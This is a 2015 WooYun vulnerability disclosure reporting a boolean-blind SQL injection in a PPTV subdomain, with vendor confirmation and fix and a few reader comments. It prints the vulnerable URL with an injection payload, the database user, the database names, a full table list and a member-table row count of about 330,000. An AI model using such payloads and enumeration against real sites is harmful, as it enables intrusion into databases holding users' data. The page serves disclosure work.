当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-090129

漏洞标题:PPTV某站点MySQL注射(members表33万数据)

相关厂商:PPTV(PPlive)

漏洞作者: lijiejie

提交时间:2015-01-05 20:19

修复时间:2015-01-07 14:35

公开时间:2015-01-07 14:35

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-05: 细节已通知厂商并且等待厂商处理中
2015-01-06: 厂商已经确认,细节仅向厂商公开
2015-01-07: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

PPTV某站点MySQL注射(members表33万数据), MySQL bool blind.

详细说明:

注入点:

http://ksf.zone.pptv.com/post?id=1 AND length(user())=19


参数id可注入。 MySQL bool blind.
还有个域名: http://expo2010.pptv.com/

漏洞证明:

current user:    'pp_ae@10.%'


available databases [10]:
[*] information_schema
[*] pp_hezuo_swarovski
[*] pp_zo_inyy
[*] pp_zo_vmei
[*] pp_zone
[*] pp_zone_public
[*] pplive_ctf
[*] pplive_heiren
[*] pplive_kefu
[*] pplive_rss


kefu表:

Database: pplive_kefu
[103 tables]
+----------------------+
| cdb_access |
| cdb_activities |
| cdb_activityapplies |
| cdb_addons |
| cdb_adminactions |
| cdb_admincustom |
| cdb_admingroups |
| cdb_adminnotes |
| cdb_adminsessions |
| cdb_advertisements |
| cdb_announcements |
| cdb_attachmentfields |
| cdb_attachments |
| cdb_attachpaymentlog |
| cdb_attachtypes |
| cdb_banned |
| cdb_bbcodes |
| cdb_caches |
| cdb_creditslog |
| cdb_crons |
| cdb_debateposts |
| cdb_debates |
| cdb_failedlogins |
| cdb_faqs |
| cdb_favoriteforums |
| cdb_favorites |
| cdb_favoritethreads |
| cdb_feeds |
| cdb_forumfields |
| cdb_forumlinks |
| cdb_forumrecommend |
| cdb_forums |
| cdb_imagetypes |
| cdb_invites |
| cdb_itempool |
| cdb_magiclog |
| cdb_magicmarket |
| cdb_magics |
| cdb_medallog |
| cdb_medals |
| cdb_memberfields |
| cdb_membermagics |
| cdb_memberrecommend |
| cdb_members |
| cdb_memberspaces |
| cdb_moderators |
| cdb_modworks |
| cdb_mytasks |
| cdb_navs |
| cdb_onlinelist |
| cdb_onlinetime |
| cdb_orders |
| cdb_paymentlog |
| cdb_pluginhooks |
| cdb_plugins |
| cdb_pluginvars |
| cdb_polloptions |
| cdb_polls |
| cdb_postposition |
| cdb_posts |
| cdb_profilefields |
| cdb_projects |
| cdb_promotions |
| cdb_prompt |
| cdb_promptmsgs |
| cdb_prompttype |
| cdb_ranks |
| cdb_ratelog |
| cdb_regips |
| cdb_relatedthreads |
| cdb_reportlog |
| cdb_request |
| cdb_rewardlog |
| cdb_rsscaches |
| cdb_searchindex |
| cdb_sessions |
| cdb_settings |
| cdb_smilies |
| cdb_spacecaches |
| cdb_stats |
| cdb_statvars |
| cdb_styles |
| cdb_stylevars |
| cdb_tags |
| cdb_tasks |
| cdb_taskvars |
| cdb_templates |
| cdb_threads |
| cdb_threadsmod |
| cdb_threadtags |
| cdb_threadtypes |
| cdb_tradecomments |
| cdb_tradelog |
| cdb_tradeoptionvars |
| cdb_trades |
| cdb_typemodels |
| cdb_typeoptions |
| cdb_typeoptionvars |
| cdb_typevars |
| cdb_usergroups |
| cdb_validating |
| cdb_warnings |
| cdb_words |
+----------------------+


members表有30多万数据:

Database: pplive_kefu
+-------------+---------+
| Table | Entries |
+-------------+---------+
| cdb_members | 331865 |
+-------------+---------+


到此为止,未进一步利用。

修复方案:

转换,过滤

版权声明:转载请注明来源 lijiejie@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-01-06 09:49

厂商回复:

非常感谢,我们安排处理中

最新状态:

2015-01-07:已修复 感谢各位


漏洞评价:

评论

  1. 2015-01-05 20:35 | 浅蓝 ( 普通白帽子 | Rank:274 漏洞数:109 | 爱安全:www.ixsec.orgXsec社区:zone.ixse...)

    前排

  2. 2015-01-05 23:23 | X,D ( 普通白帽子 | Rank:143 漏洞数:8 | X,D)

    占座

  3. 2015-01-08 09:43 | todaro ( 实习白帽子 | Rank:39 漏洞数:12 | 完结。)

    战线一长,二级三级域名各种问题

  4. 2015-01-21 16:06 | Sofia ( 路人 | Rank:25 漏洞数:6 | 不会渗透的SEOer不是好站长)

    数据给他拿了会怎样